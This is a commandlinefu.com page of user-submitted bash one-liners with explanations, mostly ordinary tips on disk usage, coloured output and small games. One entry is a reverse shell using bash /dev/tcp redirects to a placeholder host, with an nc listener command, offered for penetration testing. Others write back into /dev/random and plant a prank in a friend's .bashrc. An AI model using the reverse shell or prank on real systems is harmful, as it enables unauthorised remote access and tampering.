What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.


If you have a new feature suggestion or find a bug, please get in touch via http://commandlinefu.uservoice.com/

Get involved!

You can sign in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams, as well as feeds for virtually every other subset (users, tags, functions, …).

News

2011-03-12 - Confoo 2011 presentation
Slides are available from the commandlinefu presentation at Confoo 2011: http://presentations.codeinthehole.com/confoo2011/
2011-01-04 - Moderation now required for new commands
To try to put an end to the spamming, new commands require moderation before they appear on the site.
2010-12-27 - Apologies for not banning the trolls sooner
Have been away from the interwebs over Christmas. Will be more vigilant henceforth.
2010-09-24 - OAuth and pagination problems fixed
Apologies for the delay in getting Twitter's OAuth supported. Annoying pagination gremlin also fixed.

Terminal - Commands tagged bash - 715 results
cat *.txt >output.txt
ls | grep '\.txt$' | while read file; do cat "$file" >> ./output.txt; done
alias head='head -n $((${LINES:-`tput lines 2>/dev/null||echo -n 12`} - 2))'
26

Run the alias command, then issue

ps aux | head

and resize your terminal window (PuTTY, console, HyperTerm, xterm, etc.), then issue the same command again and you'll understand.

${LINES:-`tput lines 2>/dev/null||echo -n 12`}

Instructs the shell to use the output of `tput lines` (ncurses-based terminal access) to get the number of lines in your terminal when LINES is not set or null. In case that doesn't work either, it falls back to a default of 12 (which the -2 turns into 10, head's usual default).
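
As a minimal sketch of that fallback chain (run it in a script or subshell; the variable handling here is just for illustration):

unset LINES   # simulate a shell where LINES is not set
echo "${LINES:-`tput lines 2>/dev/null||echo -n 12`}"   # prints the tput value, or 12 if tput fails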

The default for head is to output the first 10 lines; this alias changes the default to output the first x lines instead, where x is the number of lines currently displayed on your terminal minus 2. The -2 is there so that the top line displayed is the command you ran that used head, i.e. the prompt.

Depending on whether your PS1 and/or PROMPT_COMMAND output more than 1 line (mine outputs 3), you will want to subtract more than 2. So with my prompt being the following, I need -7, or -5 if I only want to display the command line at the top. ( http://www.askapache.com/linux-unix/bash-power-prompt.html )

275MB/748MB

[7995:7993 - 0:186] 06:26:49 Thu Apr 08 [askapache@n1-backbone5:/dev/pts/0 +1] ~

In most shells the LINES variable is created automatically at login and updated when the terminal is resized (via SIGWINCH: signal 28 on Linux, 23 or 20 on other systems) to contain the number of vertical lines that fit in your terminal window. Because the alias doesn't hard-code the line count but relies on the $LINES variable, it is dynamic and will always work on a tty device.

hb(){ sed "s/\($*\)/`tput setaf 2;tput setab 0;tput blink`\1`tput sgr0`/gI"; }
2010-04-07 08:45:26
User: AskApache
Functions: sed
-2

hb makes the match blink; hc shows it in reverse colors with a background. Both are very nice.

hc(){ sed "s/\($*\)/`tput setaf 0;tput setab 6`\1`tput sgr0`/gI"; }

Run this:

command ps -Hacl -F S -A f | hc ".*$PPID.*" | hb ".*$$.*"

You're welcome ;)

From my bash profile - http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html
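
As another hedged illustration of these highlighters on ordinary output (the pattern is just an example):

dmesg | hb "usb"   # every case-insensitive match of "usb" blinks in green on black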

date +%A | cut -c $(( $(date +%A | wc -c) - 1 ))
2010-04-07 00:23:15
User: DaveQB
Functions: cut date wc
Tags: bash echo cut date wc
0

A command to find out what letter the day's name ends in. It can be edited slightly to find what "any" output ends in.

NB: I haven't tested with weird and wonderful output.
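
A shorter sketch of the same check using grep (any grep with -q should do):

date +%A | grep -q 'y$' && echo "ends in y"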

function ends_in_y() { case $(date +%A) in *y ) true ;; * ) false ;; esac } ; ends_in_y && echo ok
2010-04-06 22:18:52
Functions: date echo false true
-1

The shell has perfectly adequate pattern matching for simple expressions.
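
As a sketch (not the poster's version), the same test also collapses to a single line with bash's [[ ]] globbing:

[[ $(date +%A) == *y ]] && echo "ends in y"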

function ends_in_y() { if [ `date +%A | sed -e 's/\(^.*\)\(.$\)/\2/'` == "y" ]; then echo 1; else echo 0; fi }
2010-04-06 20:14:34
User: allrightname
Functions: echo sed
-3

For those days when you need to know if something is happening because the day ends in "y".

du -cks * | sort -rn | while read size fname; do for unit in k M G T P E Z Y; do if [ $size -lt 1024 ]; then echo -e "${size}${unit}\t${fname}"; break; fi; size=$((size/1024)); done; done
wget randomfunfacts.com -O - 2>/dev/null | grep \<strong\> | sed "s;^.*<i>\(.*\)</i>.*$;\1;" | while read FUNFACT; do notify-send -t $((1000+300*`echo -n $FUNFACT | wc -w`)) -i gtk-dialog-info "RandomFunFact" "$FUNFACT"; done
2010-04-02 09:43:32
User: mtron
Functions: grep read sed wc wget
2

Extension to tali713's random fact generator: it takes the output and sends it to notify-osd. Display time is proportional to the length of the fact.
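
For example, with a made-up 7-word fact the timeout arithmetic works out to 1000 + 300*7 = 3100 milliseconds:

FUNFACT="Bananas are berries but strawberries are not"   # hypothetical fact text
echo $(( 1000 + 300 * $(echo -n "$FUNFACT" | wc -w) ))   # prints 3100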

PROMPT_COMMAND='if [ $RANDOM -le 3200 ]; then printf "\0337\033[%d;%dH\033[4%dm \033[m\0338" $((RANDOM%LINES+1)) $((RANDOM%COLUMNS+1)) $((RANDOM%8)); fi'
2010-04-01 06:52:32
User: hotdog003
Functions: printf
Tags: bash
24

Add this to a friend's .bashrc.

PROMPT_COMMAND will run just before a prompt is drawn.

RANDOM will be between 0 and 32767; in this case, the snippet will run about 1/10th of the time.

\033 is the escape character. I'll call it \e for short.

\e7 -- save cursor position.

\e[%d;%dH -- move cursor to absolute position

\e[4%dm \e[m -- draw a random color at that point

\e8 -- restore position.
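
Putting those pieces together outside of PROMPT_COMMAND, with the position and color hard-coded for illustration:

printf '\0337\033[5;10H\033[42m \033[m\0338'   # paint one green cell at row 5, column 10, then restore the cursor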

find . -type d -name '*[A-Z]*' -execdir bash -c '! test -f "$(echo "$0" | tr "[:upper:]" "[:lower:]")"' {} \; -execdir bash -c 'mv "$0" "$(echo "$0" | tr "[:upper:]" "[:lower:]")"' {} \;
while $8;do read n;[ $n = "$l" ]&&c=$(($c+1))||c=0;echo $c;l=$n;done
2010-03-31 00:41:08
User: florian
Functions: read
Tags: bash read Game
1

Hold period (or whatever character) and hit enter after a second. You need to make the next line of periods the same length as the previous line... The score starts at 0 and increases each time the line length matches the previous one.

wget randomfunfacts.com -O - 2>/dev/null | grep \<strong\> | sed "s;^.*<i>\(.*\)</i>.*$;\1;"
2010-03-30 23:49:30
User: tali713
Functions: grep sed wget
13

Without infinite time and knowledge of how the site will be designed in the future, this may eventually stop working; still, it serves as a simple, straightforward starting point.

This uses the observation that the only item marked as strong on the page is the single logical line that includes the italicized fact.

If future revisions of the page show failure, or intermittent failure, one may simply alter the above to read:

wget randomfunfacts.com -O - 2>/dev/null | tee lastfact | grep \<strong\> | sed "s;^.*<i>\(.*\)</i>.*$;\1;"

The file lastfact can then be examined whenever the command fails.

du -kd | egrep -v "/.*/" | sort -n
2010-03-30 15:40:35
User: rmbjr60
Functions: du egrep sort
-1

Thanks for the submission! My alternative produces summaries only for directories; the original post additionally lists all files in the current directory, which can clutter up the output. Once the big directory is located, *then* worry about which file(s) are consuming so much space.

count="1" ; while true ; do read next ; if [[ "$next" = "$last" ]] ; then count=$(($count+1)) ; echo "$count" ; else count="1" ; echo $count ; fi ; last="$next" ; done
2010-03-30 04:02:29
User: dabom
Functions: echo read true
Tags: bash read Game
8

Really bored during class so I made this...

Basically, you hold period (or whatever) and hit enter after a second and you need to make the next line of periods the same length as the previous line...

My record was 5 lines of the same length.

It's best if you do it one-handed, with your pointer finger on period and your ring finger on enter.

find ${PATH//:/ } -iname "*admin*" -executable -type f
2010-03-29 10:20:07
User: sanmiguel
Functions: find
Tags: bash find unix
1

While it seems (to me at least) a little counter-intuitive to filter on name first, this requires less work for find: it can immediately discount any files that do not match the name, straight from the directory listing on disk. Querying against file attributes requires reading the file attributes, which is performed for all files matching any name-based predicates.
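
For comparison, this reversed ordering (a sketch to illustrate the point) returns the same results but forces find to read attributes for every file before the cheap name test:

find ${PATH//:/ } -executable -type f -iname "*admin*"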

svn stat -u | sort | sed -e "s/^M.*/\o033[31m&\o033[0m/" -e "s/^A.*/\o033[34m&\o033[0m/" -e "s/^D.*/\o033[35m&\o033[0m/"
2010-03-26 15:44:04
Functions: sed sort stat
Tags: bash svn sed
1

Use color escape sequences and sed to colorize the output of svn stat -u.

Colors: http://www.faqs.org/docs/abs/HTML/colorizing.html

svn stat characters: http://svnbook.red-bean.com/en/1.4/svn-book.html#svn.ref.svn.c.status

GNU Extensions for Escapes in Regular Expressions: http://www.gnu.org/software/sed/manual/html_node/Escapes.html
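
To see the \o033 escape in isolation (the status line here is made up):

echo "M       foo.c" | sed "s/^M.*/\o033[31m&\o033[0m/"   # prints the line in red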

alias dush="du -sm *|sort -n|tail"
2010-03-26 10:18:57
User: funky
Functions: alias
28

Sorts the files by integer megabytes, which should be enough to (interactively) find the space wasters. Now you can

dush

for the above output,

dush -n 3

for only the 3 biggest files, and so on. It's always a good idea to have this line in your .profile or .bashrc.

printf ${PATH//:/\\n}
ls -d $(echo ${PATH//:/ }) > /dev/null
if [ "$(ping -q -c1 google.com)" ];then wget -mnd -q http://www.google.com/intl/en_ALL/images/logo.gif ;fi
2010-03-23 04:15:03
User: alf
Functions: wget
-1

Bash script to test if a server is up; you can use this before wget'ing a file to make sure a blank one isn't downloaded.
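
A sketch of a variant that tests ping's exit status directly instead of capturing its output:

if ping -q -c1 google.com >/dev/null 2>&1; then wget -mnd -q http://www.google.com/intl/en_ALL/images/logo.gif; fi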

find . -type f -name '*.mp3' -execdir mp3gain -a '{}' +
2010-03-21 22:23:44
Functions: find
1

This normalizes volume in your mp3 library, but uses mp3gain's "album" mode. This applies a gain change to all files from each directory (which are presumed to be from the same album) - so their volume relative to one another is changed, while the average album volume is normalized. This is done because if one track from an album is quieter or louder than the others, it was probably meant to be that way.
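
If you would rather normalize each track independently, mp3gain's track mode should do it; a sketch:

find . -type f -name '*.mp3' -execdir mp3gain -r '{}' +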

find /dev/ -name random -exec bash -c '[ -r $0 -a -w $0 ] && dd if=$0 | sort | dd of=$0' {} \;
exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
2010-03-18 17:25:08
User: truemilk
Functions: exec
2

Connect-back shell using Bash built-ins. Useful in a web app penetration test against a locked-down environment, since it needs no file uploads or writable directory.

--

/dev/tcp and /dev/udp redirects must be enabled at compile time in Bash.

Most Linux distros enable this feature by default but at least Debian is known to disable it.

--

http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
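
For the shell to have somewhere to connect back to, something must already be listening on the chosen port; with traditional netcat that might look like this (port number is a placeholder):

nc -l -p 4444   # traditional netcat syntax; OpenBSD netcat uses: nc -l 4444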

echo $(( `ulimit -u` - `find /proc -maxdepth 1 \( -user $USER -o -group $GROUPNAME \) -type d|wc -l` ))
2010-03-12 08:42:49
User: AskApache
Functions: echo wc
1

There is a limit to how many processes each user can run at the same time, especially with web hosts. If the maximum # of processes for your user is 200, then the following sets OPTIMUM_P to about 100 (half of the limit minus the processes already running).

OPTIMUM_P=$(( (`ulimit -u` - `find /proc -maxdepth 1 \( -user $USER -o -group $GROUPNAME \) -type d|wc -l`) / 2 ))

This is very useful in scripts because it is such a fast, low-resource way (compared to ps, who, lsof, etc.) to determine how many processes are currently running for whichever user. The number of currently running processes is subtracted from the high limit set up for the account (see limits.conf, pam, initscripts).

An easy-to-understand example: this searches the current directory for shell scripts and runs up to 100 'file' commands at the same time, greatly speeding up the job.

find . -type f | xargs -P $OPTIMUM_P -iFNAME file FNAME | sed -n '/shell script text/p'

I am using it in my http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html especially for the xargs command. Xargs has a -P option that lets you specify how many processes to run at the same time. For instance if you have 1000 urls in a text file and wanted to download all of them fast with curl, you could download 100 at a time (check ps output on a separate [pt]ty for proof) like this:

cat url-list.txt | xargs -I '{}' -P $OPTIMUM_P curl -O '{}'

I like to do things as fast as possible on my servers. I have several types of servers and hosting environments, some with very restrictive jailed shells with a 20-process limit, some with 200, some with 8000. For the jailed shells a fixed xargs -P10 would kill my shell or dump core, but using the above I can set the -P value dynamically, so xargs always works, like this:

cat url-list.txt | xargs -I '{}' -P $OPTIMUM_P curl -O '{}'

If you were building a process-killer (very common for cheap hosting) this would also be handy.

Note that if you are only allowed 20 or so processes, you should just use -P1 with xargs.
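
A minimal sketch wrapping the same calculation in a reusable function (the function name is made up, and the group test from the original is dropped for brevity):

optimum_p() { echo $(( ( $(ulimit -u) - $(find /proc -maxdepth 1 -user "$USER" -type d | wc -l) ) / 2 )); }
find . -type f | xargs -P "$(optimum_p)" file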